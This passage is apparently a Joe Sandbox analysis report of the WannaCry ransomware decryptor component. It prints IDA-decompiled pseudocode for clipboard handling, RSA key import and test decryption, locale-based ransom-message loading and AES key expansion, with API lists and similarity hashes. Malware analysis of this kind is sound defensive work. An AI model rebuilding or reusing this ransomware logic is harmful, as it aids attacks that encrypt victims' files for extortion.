                                  									_t226 = _t226 + _t157;
                                  									_t206 = _a8 + 1;
                                  									_v4 = _t185;
                                  									_a8 = _t206;
                                  									if(_t206 < _t102) {
                                  										continue;
                                  									} else {
                                  										goto L11;
                                  									}
                                  									goto L31;
                                  								}
                                  								__imp__??0exception@@QAE@ABQBD@Z(0x4213a8);
                                  								_t130 =  &_v24;
                                  								_push(0x41c9c0);
                                  								_push(_t130);
                                  								L004130FC();
                                  								goto L13;
                                  							}
                                  						}
                                  					}
                                  				}
                                  				L31:
                                  			}

                                  APIs
                                  • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040B3D9
                                  • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B3E9
                                  • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040B4D8
                                  • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B4E8
                                  • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040B5A5
                                  • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B5B5
                                  • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213AC), ref: 0040B60B
                                  • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B61B
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ??0exception@@ExceptionThrow
                                  • String ID:
                                  • API String ID: 941485209-0
                                  • Opcode ID: 1e9378705d9ba196d58f13d3cc7227803daa0403281f32e8405f41cd2aefe311
                                  • Instruction ID: 0dbcc5357461fba905cfbac0272349747bc27b8ce320a87ccfe5983878451c5e
                                  • Opcode Fuzzy Hash: 1e9378705d9ba196d58f13d3cc7227803daa0403281f32e8405f41cd2aefe311
                                  • Instruction Fuzzy Hash: 7A61D5316043158BC705DE2998919ABB7E6FFC8704F04497EFC89BB345C738AA06CB99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00407C30(void* __ecx) {
                                  				int _t9;
                                  				void* _t15;
                                  				void* _t22;
                                  				signed int _t25;
                                  				signed int _t26;
                                  				void* _t39;
                                  				void* _t40;
                                  
                                  				_t39 = __ecx;
                                  				_t9 = OpenClipboard( *(__ecx + 0x20));
                                  				if(_t9 == 0) {
                                  					return _t9;
                                  				} else {
                                  					_t22 = GlobalAlloc(2,  *((intOrPtr*)( *(_t39 + 0x508) - 8)) + 1);
                                  					if(_t22 != 0) {
                                  						EmptyClipboard();
                                  						_t40 =  *(_t39 + 0x508);
                                  						_t15 = GlobalLock(_t22);
                                  						_t25 =  *((intOrPtr*)(_t40 - 8)) + 1;
                                  						_t26 = _t25 >> 2;
                                  						memcpy(_t15, _t40, _t26 << 2);
                                  						memcpy(_t40 + _t26 + _t26, _t40, _t25 & 0x00000003);
                                  						GlobalUnlock(_t22);
                                  						SetClipboardData(1, _t22);
                                  						return CloseClipboard();
                                  					}
                                  					return CloseClipboard();
                                  				}
                                  			}

                                  APIs
                                  • OpenClipboard.USER32(?), ref: 00407C38
                                  • GlobalAlloc.KERNEL32(00000002,?), ref: 00407C4F
                                  • CloseClipboard.USER32 ref: 00407C5B
                                  • EmptyClipboard.USER32 ref: 00407C66
                                  • GlobalLock.KERNEL32(00000000), ref: 00407C79
                                  • GlobalUnlock.KERNEL32(00000000), ref: 00407C92
                                  • SetClipboardData.USER32(00000001,00000000), ref: 00407C9B
                                  • CloseClipboard.USER32 ref: 00407CA1
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Clipboard$Global$Close$AllocDataEmptyLockOpenUnlock
                                  • String ID:
                                  • API String ID: 142981918-0
                                  • Opcode ID: 93754508b4dfef54d9d98e8e63777799f1bb11e1cbd450fa109b80c0f9b4831a
                                  • Instruction ID: 8252ba06fde5d142781bbccc432981ef86be9671d894a3679d09edf034c0945c
                                  • Opcode Fuzzy Hash: 93754508b4dfef54d9d98e8e63777799f1bb11e1cbd450fa109b80c0f9b4831a
                                  • Instruction Fuzzy Hash: 1D014B71740A05DFD714ABA5EC8DAFBB7A9FB88356B908079F54AC3350CF61AC048B64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 47%
                                  			E004047C0(intOrPtr __ecx, intOrPtr _a4, signed int _a8) {
                                  				long* _v8;
                                  				char _v20;
                                  				void _v539;
                                  				char _v540;
                                  				char _v543;
                                  				char _v544;
                                  				intOrPtr _v548;
                                  				char _v552;
                                  				int _v556;
                                  				intOrPtr _v560;
                                  				void* __ebx;
                                  				char _t38;
                                  				void* _t45;
                                  				void* _t48;
                                  				intOrPtr _t63;
                                  				intOrPtr _t67;
                                  				signed int _t76;
                                  				unsigned int _t78;
                                  				signed int _t79;
                                  				long* _t85;
                                  				char _t92;
                                  				void* _t116;
                                  				intOrPtr _t118;
                                  				void* _t120;
                                  				void* _t121;
                                  
                                  				_push(0xffffffff);
                                  				_push(0x415e38);
                                  				_push(0x413050);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t118;
                                  				_t63 = __ecx;
                                  				_v560 = __ecx;
                                  				_t38 = "TESTDATA"; // 0x54534554
                                  				_v552 = _t38;
                                  				_t67 =  *0x420c64; // 0x41544144
                                  				_v548 = _t67;
                                  				_t92 =  *0x420c68; // 0x0
                                  				_v544 = _t92;
                                  				_v543 = 0;
                                  				_v540 = 0;
                                  				memset( &_v539, 0, 0x7f << 2);
                                  				_t120 = _t118 - 0x21c + 0xc;
                                  				asm("stosw");
                                  				asm("stosb");
                                  				asm("repne scasb");
                                  				_v556 = 0xbadbac;
                                  				if(E004046B0(_t63) == 0) {
                                  					L6:
                                  					 *[fs:0x0] = _v20;
                                  					return 0;
                                  				} else {
                                  					_v8 = 0;
                                  					_t45 = E004049B0( *((intOrPtr*)(_t63 + 4)), _t63 + 8, _a4);
                                  					_t121 = _t120 + 0xc;
                                  					if(_t45 == 0) {
                                  						L12:
                                  						_push(0xffffffff);
                                  						_push( &_v20);
                                  						goto L5;
                                  					} else {
                                  						_t76 = _a8;
                                  						_t48 = E004049B0( *((intOrPtr*)(_t63 + 4)), _t63 + 0xc, _t76);
                                  						_t121 = _t121 + 0xc;
                                  						if(_t48 == 0) {
                                  							goto L12;
                                  						} else {
                                  							asm("repne scasb");
                                  							_t78 =  !(_t76 | 0xffffffff);
                                  							_t116 =  &_v552 - _t78;
                                  							_t79 = _t78 >> 2;
                                  							memcpy(_t116 + _t79 + _t79, _t116, memcpy( &_v540, _t116, _t79 << 2) & 0x00000003);
                                  							_t121 = _t121 + 0x18;
                                  							_push(0x200);
                                  							_push( &_v556);
                                  							_push( &_v540);
                                  							_push(0);
                                  							_push(1);
                                  							_push(0);
                                  							_push( *((intOrPtr*)(_t63 + 8)));
                                  							if( *0x4217cc() != 0) {
                                  								_t85 =  *(_t63 + 0xc);
                                  								if(CryptDecrypt(_t85, 0, 1, 0,  &_v540,  &_v556) != 0) {
                                  									asm("repne scasb");
                                  									if(strncmp( &_v540,  &_v552,  !(_t85 | 0xffffffff) - 1) != 0) {
                                  										_v8 = 0xffffffff;
                                  										E004049A6(_t63);
                                  										goto L6;
                                  									} else {
                                  										_push(0xffffffff);
                                  										_push( &_v20);
                                  										L00413056();
                                  										 *[fs:0x0] = _v20;
                                  										return 1;
                                  									}
                                  								} else {
                                  									_push(0xffffffff);
                                  									_push( &_v20);
                                  									goto L5;
                                  								}
                                  							} else {
                                  								_push(0xffffffff);
                                  								_push( &_v20);
                                  								L5:
                                  								L00413056();
                                  								goto L6;
                                  							}
                                  						}
                                  					}
                                  				}
                                  			}

                                  APIs
                                    • Part of subcall function 004046B0: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,0040484E), ref: 004046CD
                                    • Part of subcall function 004049B0: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004049F5
                                    • Part of subcall function 004049B0: GetFileSize.KERNEL32(00000000,00000000), ref: 00404A0B
                                    • Part of subcall function 004049B0: _local_unwind2.MSVCRT ref: 00404AC7
                                  • CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,?,00000200), ref: 004048DB
                                  • _local_unwind2.MSVCRT ref: 004048EB
                                  • CryptDecrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,?), ref: 00404920
                                  • strncmp.MSVCRT(00000000,?), ref: 00404951
                                  • _local_unwind2.MSVCRT ref: 00404964
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Crypt_local_unwind2$File$AcquireContextCreateDecryptEncryptSizestrncmp
                                  • String ID: TESTDATA
                                  • API String ID: 154225373-1607903762
                                  • Opcode ID: 20c9666a7ffcf9d4be304aa18a7e829ae4cc28ed87e3f3fd2989e324c574ec42
                                  • Instruction ID: 12943b98363484da7d263465f98eb3331ab271d68fc45af0c4cd497e7be75c93
                                  • Opcode Fuzzy Hash: 20c9666a7ffcf9d4be304aa18a7e829ae4cc28ed87e3f3fd2989e324c574ec42
                                  • Instruction Fuzzy Hash: 21512DB6600218ABCB24CB64DC45BEBB7B4FB98320F10477DF915A72C1EB749A44CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 62%
                                  			E004049B0(long* _a4, HCRYPTKEY* _a8, CHAR* _a12) {
                                  				int _v8;
                                  				char _v20;
                                  				long _v32;
                                  				int _v36;
                                  				long _v40;
                                  				void* _v44;
                                  				long _t24;
                                  				int _t28;
                                  				BYTE* _t35;
                                  				void* _t46;
                                  				long _t51;
                                  				intOrPtr _t53;
                                  
                                  				_push(0xffffffff);
                                  				_push(0x415e48);
                                  				_push(0x413050);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t53;
                                  				_v44 = 0xffffffff;
                                  				_v32 = 0;
                                  				_v36 = 0;
                                  				_v8 = 0;
                                  				_t46 = CreateFileA(_a12, 0x80000000, 1, 0, 3, 0, 0);
                                  				_v44 = _t46;
                                  				if(_t46 == 0xffffffff) {
                                  					L10:
                                  					_push(0xffffffff);
                                  					goto L11;
                                  				} else {
                                  					_t24 = GetFileSize(_t46, 0);
                                  					_t51 = _t24;
                                  					_v40 = _t51;
                                  					if(_t51 != 0xffffffff) {
                                  						if(_t51 <= 0x19000) {
                                  							_t35 = GlobalAlloc(0, _t51);
                                  							_v36 = _t35;
                                  							if(_t35 == 0) {
                                  								goto L10;
                                  							} else {
                                  								if(ReadFile(_t46, _t35, _t51,  &_v32, 0) != 0) {
                                  									_t28 = CryptImportKey(_a4, _t35, _v32, 0, 0, _a8);
                                  									_push(0xffffffff);
                                  									if(_t28 == 0) {
                                  										L11:
                                  										_push( &_v20);
                                  										goto L12;
                                  									} else {
                                  										_push( &_v20);
                                  										L00413056();
                                  										 *[fs:0x0] = _v20;
                                  										return 1;
                                  									}
                                  								} else {
                                  									_push(0xffffffff);
                                  									_push( &_v20);
                                  									goto L12;
                                  								}
                                  							}
                                  						} else {
                                  							_push(0xffffffff);
                                  							_push( &_v20);
                                  							goto L12;
                                  						}
                                  					} else {
                                  						_push(_t24);
                                  						_push( &_v20);
                                  						L12:
                                  						L00413056();
                                  						 *[fs:0x0] = _v20;
                                  						return 0;
                                  					}
                                  				}
                                  			}
















                                  APIs
                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004049F5
                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00404A0B
                                  • _local_unwind2.MSVCRT ref: 00404AC7
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$CreateSize_local_unwind2
                                  • String ID:
                                  • API String ID: 1039228802-0
                                  • Opcode ID: 90535d59a0f2dbe90f1bf53ea38d3d76a54ffae39caaa8181d17ff2389417ade
                                  • Instruction ID: 027920ce5e1762b5ae47f20262b5a931ea28e629a989eecbafe96ff87ad0b853
                                  • Opcode Fuzzy Hash: 90535d59a0f2dbe90f1bf53ea38d3d76a54ffae39caaa8181d17ff2389417ade
                                  • Instruction Fuzzy Hash: 723153B1A40219BBDB10DF98DC84FFFB6ACE789771F14472AF525A22C0D33859018B68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 85%
                                  			E00406C20(void* __ecx) {
                                  				void _v51;
                                  				void* _v52;
                                  				signed int _t14;
                                  				void* _t26;
                                  				char* _t30;
                                  				unsigned int _t36;
                                  				signed int _t37;
                                  				void* _t55;
                                  
                                  				_t26 = __ecx;
                                  				_v52 = 0;
                                  				memset( &_v51, 0, 0xc << 2);
                                  				asm("stosb");
                                  				_t14 = GetUserDefaultLangID();
                                  				_t30 =  &_v52;
                                  				if(GetLocaleInfoA(_t14 & 0x0000ffff, 0x1001, _t30, 0x32) == 0) {
                                  					asm("repne scasb");
                                  					_t36 =  !(_t30 | 0xffffffff);
                                  					_t55 = "English" - _t36;
                                  					_t37 = _t36 >> 2;
                                  					memcpy(_t55 + _t37 + _t37, _t55, memcpy( &_v52, _t55, _t37 << 2) & 0x00000003);
                                  				}
                                  				if(SendMessageA( *(_t26 + 0x80), 0x158, 0,  &_v52) != 0xffffffff) {
                                  					SendMessageA( *(_t26 + 0x80), 0x14d, 0,  &_v52);
                                  					return E00406AE0(_t26);
                                  				} else {
                                  					SendMessageA( *(_t26 + 0x80), 0x14e, 0, 0);
                                  					return E00406AE0(_t26);
                                  				}
                                  			}












                                  APIs
                                  • GetUserDefaultLangID.KERNEL32 ref: 00406C3B
                                  • GetLocaleInfoA.KERNEL32(00000000,00001001,00000000,00000032), ref: 00406C53
                                  • SendMessageA.USER32(?,00000158,00000000,00000000), ref: 00406C9A
                                  • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00406CB1
                                  • SendMessageA.USER32(?,0000014D,00000000,00000000), ref: 00406CD4
                                    • Part of subcall function 00406AE0: #540.MFC42(?,765920C0), ref: 00406B03
                                    • Part of subcall function 00406AE0: #3874.MFC42 ref: 00406B1B
                                    • Part of subcall function 00406AE0: #537.MFC42(msg\), ref: 00406B29
                                    • Part of subcall function 00406AE0: #924.MFC42(?,00000000,m_%s.wnry,msg\), ref: 00406B41
                                    • Part of subcall function 00406AE0: sprintf.MSVCRT ref: 00406B59
                                    • Part of subcall function 00406AE0: #800.MFC42(?,?,765920C0), ref: 00406B62
                                    • Part of subcall function 00406AE0: #800.MFC42 ref: 00406B73
                                    • Part of subcall function 00406AE0: GetFileAttributesA.KERNEL32(?), ref: 00406B7D
                                    • Part of subcall function 00406AE0: #537.MFC42(msg\), ref: 00406B91
                                    • Part of subcall function 00406AE0: #924.MFC42(?,00000000,m_%s.wnry,msg\), ref: 00406BA9
                                    • Part of subcall function 00406AE0: sprintf.MSVCRT ref: 00406BBB
                                    • Part of subcall function 00406AE0: #800.MFC42(?,?,?,?,?,765920C0), ref: 00406BC4
                                    • Part of subcall function 00406AE0: #800.MFC42 ref: 00406BD5
                                    • Part of subcall function 00406AE0: #800.MFC42(?), ref: 00406BF5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #800$MessageSend$#537#924sprintf$#3874#540AttributesDefaultFileInfoLangLocaleUser
                                  • String ID: English
                                  • API String ID: 600832625-3812506524
                                  • Opcode ID: 98bbcc99f84d21185ee3b515649f036d805e480a8587630640b34afead2fff3e
                                  • Instruction ID: 12cb8a10269d81aa60d086da51d7e65d8080bc449a50ca3d57c6290c1d86febe
                                  • Opcode Fuzzy Hash: 98bbcc99f84d21185ee3b515649f036d805e480a8587630640b34afead2fff3e
                                  • Instruction Fuzzy Hash: F911D3717402006BEB149634DC42BAB7795EBD4720F54863EFE5AEB2D0D9F8A8098794
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 60%
                                  			E0040A150(void* __ecx) {
                                  				void* _t170;
                                  				void* _t177;
                                  				unsigned int _t178;
                                  				intOrPtr _t182;
                                  				signed int _t189;
                                  				signed int _t190;
                                  				signed int _t192;
                                  				signed int* _t198;
                                  				signed int* _t203;
                                  				signed int _t214;
                                  				signed int* _t215;
                                  				signed int _t224;
                                  				void* _t236;
                                  				unsigned int _t238;
                                  				signed int _t239;
                                  				signed int _t245;
                                  				signed int _t251;
                                  				void* _t268;
                                  				void* _t275;
                                  				signed int _t276;
                                  				void* _t278;
                                  				signed int _t290;
                                  				int _t292;
                                  				signed int _t293;
                                  				signed int _t317;
                                  				signed int _t321;
                                  				signed int _t337;
                                  				signed int _t353;
                                  				signed int _t355;
                                  				intOrPtr* _t375;
                                  				signed int _t378;
                                  				void* _t385;
                                  				void* _t386;
                                  				void* _t387;
                                  				signed int _t388;
                                  				signed int* _t390;
                                  				void* _t391;
                                  				void* _t392;
                                  				signed int _t395;
                                  				signed int* _t397;
                                  				intOrPtr _t398;
                                  				void* _t399;
                                  				void* _t403;
                                  
                                  				_t236 = __ecx;
                                  				if( *((intOrPtr*)(_t399 + 4)) == 0) {
                                  					 *((intOrPtr*)(_t399 + 0x1c)) = 0x4213b4;
                                  					__imp__??0exception@@QAE@ABQBD@Z(_t399 + 0x18);
                                  					_push(0x41c9c0);
                                  					_push(_t399 + 8);
                                  					L004130FC();
                                  				}
                                  				_t170 =  *(_t399 + 0x20);
                                  				if(_t170 != 0x10 && _t170 != 0x18 && _t170 != 0x20) {
                                  					 *((intOrPtr*)(_t399 + 0x1c)) = 0x4213b4;
                                  					__imp__??0exception@@QAE@ABQBD@Z(_t399 + 0x18);
                                  					_t170 = _t399 + 8;
                                  					_push(0x41c9c0);
                                  					_push(_t170);
                                  					L004130FC();
                                  				}
                                  				_t238 =  *(_t399 + 0x24);
                                  				if(_t238 != 0x10 && _t238 != 0x18 && _t238 != 0x20) {
                                  					 *((intOrPtr*)(_t399 + 0x18)) = 0x4213b4;
                                  					_t238 = _t399 + 0xc;
                                  					__imp__??0exception@@QAE@ABQBD@Z(_t399 + 0x18);
                                  					_push(0x41c9c0);
                                  					_push(_t399 + 8);
                                  					L004130FC();
                                  				}
                                  				 *(_t236 + 0x3c8) = _t170;
                                  				 *(_t236 + 0x3cc) = _t238;
                                  				_t290 = _t238;
                                  				_t385 =  *(_t399 + 0x20);
                                  				_t19 = _t236 + 0x3d0; // 0x424
                                  				_t239 = _t238 >> 2;
                                  				memcpy(_t19, _t385, _t239 << 2);
                                  				_t386 = memcpy(_t385 + _t239 + _t239, _t385, _t290 & 0x00000003);
                                  				_t22 = _t236 + 0x3f0; // 0x444
                                  				_t245 =  *(_t236 + 0x3cc) >> 2;
                                  				memcpy(_t386 + _t245 + _t245, _t386, memcpy(_t22, _t386, _t245 << 2) & 0x00000003);
                                  				_t403 = _t399 + 0x30;
                                  				_t177 =  *(_t236 + 0x3c8);
                                  				if(_t177 == 0x10) {
                                  					_t178 =  *(_t236 + 0x3cc);
                                  					if(_t178 != 0x10) {
                                  						asm("sbb eax, eax");
                                  						_t182 = ( ~(_t178 - 0x18) & 0x00000002) + 0xc;
                                  					} else {
                                  						_t182 = 0xa;
                                  					}
                                  					 *((intOrPtr*)(_t236 + 0x410)) = _t182;
                                  				} else {
                                  					if(_t177 == 0x18) {
                                  						asm("sbb ecx, ecx");
                                  						 *((intOrPtr*)(_t236 + 0x410)) = ( ~( *(_t236 + 0x3cc) - 0x20) & 0xfffffffe) + 0xe;
                                  					} else {
                                  						 *((intOrPtr*)(_t236 + 0x410)) = 0xe;
                                  					}
                                  				}
                                  				asm("cdq");
                                  				_t292 = 0;
                                  				_t251 =  *(_t236 + 0x3cc) + (_t290 & 0x00000003) >> 2;
                                  				 *(_t403 + 0x2c) = _t251;
                                  				if( *((intOrPtr*)(_t236 + 0x410)) < 0) {
                                  					L23:
                                  					_t293 = 0;
                                  					if( *((intOrPtr*)(_t236 + 0x410)) < 0) {
                                  						L28:
                                  						_t44 = _t236 + 0x414; // 0x468
                                  						_t387 = _t44;
                                  						asm("cdq");
                                  						_t353 = ( *((intOrPtr*)(_t236 + 0x410)) + 1) * _t251;
                                  						 *(_t403 + 0x30) = _t353;
                                  						_t189 =  *(_t403 + 0x24);
                                  						_t395 =  *(_t236 + 0x3c8) + (_t293 & 0x00000003) >> 2;
                                  						 *(_t403 + 0x10) = _t395;
                                  						if(_t395 <= 0) {
                                  							L31:
                                  							_t388 = 0;
                                  							if(_t395 <= 0) {
                                  								L35:
                                  								if(_t388 >= _t353) {
                                  									L51:
                                  									_t190 = 1;
                                  									 *(_t403 + 0x30) = 1;
                                  									if( *((intOrPtr*)(_t236 + 0x410)) <= 1) {
                                  										L58:
                                  										 *((char*)(_t236 + 4)) = 1;
                                  										return _t190;
                                  									}
                                  									_t151 = _t236 + 0x208; // 0x25c
                                  									_t397 = _t151;
                                  									do {
                                  										if(_t251 <= 0) {
                                  											goto L57;
                                  										}
                                  										_t390 = _t397;
                                  										_t355 = _t251;
                                  										do {
                                  											_t192 =  *_t390;
                                  											 *(_t403 + 0x24) = _t192;
                                  											_t390 =  &(_t390[1]);
                                  											_t355 = _t355 - 1;
                                  											 *(_t390 - 4) =  *0x004191B0 ^  *0x004195B0 ^  *0x004199B0 ^  *(0x419db0 + (_t192 & 0x000000ff) * 4);
                                  										} while (_t355 != 0);
                                  										_t251 =  *(_t403 + 0x2c);
                                  										L57:
                                  										_t190 =  *(_t403 + 0x30) + 1;
                                  										_t397 =  &(_t397[8]);
                                  										 *(_t403 + 0x30) = _t190;
                                  									} while (_t190 <  *((intOrPtr*)(_t236 + 0x410)));
                                  									goto L58;
                                  								}
                                  								 *(_t403 + 0x28) = 0x41a1b0;
                                  								do {
                                  									 *(_t403 + 0x24) =  *(_t236 + 0x410 + _t395 * 4);
                                  									 *(_t236 + 0x414) =  *(_t236 + 0x414) ^ ((( *0x00416FB0 ^  *( *(_t403 + 0x28))) << 0x00000008 ^ 0) << 0x00000008 ^ 0) << 0x00000008 ^ 0;
                                  									 *(_t403 + 0x28) =  *(_t403 + 0x28) + 1;
                                  									if(_t395 == 8) {
                                  										_t104 = _t236 + 0x418; // 0x46c
                                  										_t198 = _t104;
                                  										_t268 = 3;
                                  										do {
                                  											 *_t198 =  *_t198 ^  *(_t198 - 4);
                                  											_t198 =  &(_t198[1]);
                                  											_t268 = _t268 - 1;
                                  										} while (_t268 != 0);
                                  										 *(_t403 + 0x24) =  *(_t236 + 0x420);
                                  										_t275 = 3;
                                  										 *(_t236 + 0x424) =  *(_t236 + 0x424) ^ (( *0x00416FB0 << 0x00000008 ^ 0) << 0x00000008 ^ 0) << 0x00000008 ^ 0;
                                  										_t116 = _t236 + 0x428; // 0x47c
                                  										_t203 = _t116;
                                  										do {
                                  											 *_t203 =  *_t203 ^  *(_t203 - 4);
                                  											_t203 =  &(_t203[1]);
                                  											_t275 = _t275 - 1;
                                  										} while (_t275 != 0);
                                  										L46:
                                  										 *(_t403 + 0x24) = 0;
                                  										if(_t395 <= 0) {
                                  											goto L50;
                                  										}
                                  										_t119 = _t236 + 0x414; // 0x468
                                  										_t375 = _t119;
                                  										while(1) {
                                  											_t251 =  *(_t403 + 0x2c);
                                  											if(_t388 >=  *(_t403 + 0x30)) {
                                  												goto L51;
                                  											}
                                  											_t398 =  *_t375;
                                  											asm("cdq");
                                  											_t375 = _t375 + 4;
                                  											_t276 = _t388 / _t251;
                                  											asm("cdq");
                                  											_t317 = _t388 %  *(_t403 + 0x2c);
                                  											 *((intOrPtr*)(_t236 + 8 + (_t317 + _t276 * 8) * 4)) = _t398;
                                  											_t395 =  *(_t403 + 0x10);
                                  											_t214 =  *(_t403 + 0x24) + 1;
                                  											_t388 = _t388 + 1;
                                  											 *((intOrPtr*)(_t236 + 0x1e8 + (_t317 + ( *((intOrPtr*)(_t236 + 0x410)) - _t276) * 8) * 4)) =  *((intOrPtr*)(_t375 - 4));
                                  											 *(_t403 + 0x24) = _t214;
                                  											if(_t214 < _t395) {
                                  												continue;
                                  											}
                                  											goto L50;
                                  										}
                                  										goto L51;
                                  									}
                                  									if(_t395 <= 1) {
                                  										goto L46;
                                  									}
                                  									_t101 = _t236 + 0x418; // 0x46c
                                  									_t215 = _t101;
                                  									_t278 = _t395 - 1;
                                  									do {
                                  										 *_t215 =  *_t215 ^  *(_t215 - 4);
                                  										_t215 =  &(_t215[1]);
                                  										_t278 = _t278 - 1;
                                  									} while (_t278 != 0);
                                  									goto L46;
                                  									L50:
                                  									_t251 =  *(_t403 + 0x2c);
                                  								} while (_t388 <  *(_t403 + 0x30));
                                  								goto L51;
                                  							}
                                  							_t58 = _t236 + 0x414; // 0x468
                                  							 *(_t403 + 0x24) = _t58;
                                  							while(_t388 < _t353) {
                                  								asm("cdq");
                                  								_t378 = _t388 / _t251;
                                  								asm("cdq");
                                  								_t321 = _t388 % _t251;
                                  								 *(_t403 + 0x28) = _t321;
                                  								 *((intOrPtr*)(_t236 + 8 + (_t321 + _t378 * 8) * 4)) =  *( *(_t403 + 0x24));
                                  								_t388 = _t388 + 1;
                                  								_t224 =  *(_t403 + 0x24);
                                  								 *((intOrPtr*)(_t236 + 0x1e8 + ( *(_t403 + 0x28) + ( *((intOrPtr*)(_t236 + 0x410)) - _t378) * 8) * 4)) =  *_t224;
                                  								_t353 =  *(_t403 + 0x30);
                                  								 *(_t403 + 0x24) = _t224 + 4;
                                  								if(_t388 < _t395) {
                                  									continue;
                                  								}
                                  								goto L35;
                                  							}
                                  							goto L51;
                                  						}
                                  						 *(_t403 + 0x24) = _t395;
                                  						do {
                                  							_t387 = _t387 + 4;
                                  							 *(_t387 - 4) = 0 << 0x18;
                                  							 *(_t387 - 4) =  *(_t387 - 4) | 0 << 0x00000010;
                                  							_t189 = _t189 + 4;
                                  							_t337 =  *(_t403 + 0x24) - 1;
                                  							 *(_t403 + 0x24) = _t337;
                                  						} while (_t337 != 0);
                                  						goto L31;
                                  					}
                                  					_t38 = _t236 + 0x1e8; // 0x23c
                                  					_t391 = _t38;
                                  					do {
                                  						if(_t251 > 0) {
                                  							memset(_t391, 0, _t251 << 2);
                                  							_t403 = _t403 + 0xc;
                                  							_t251 =  *(_t403 + 0x2c);
                                  						}
                                  						_t293 = _t293 + 1;
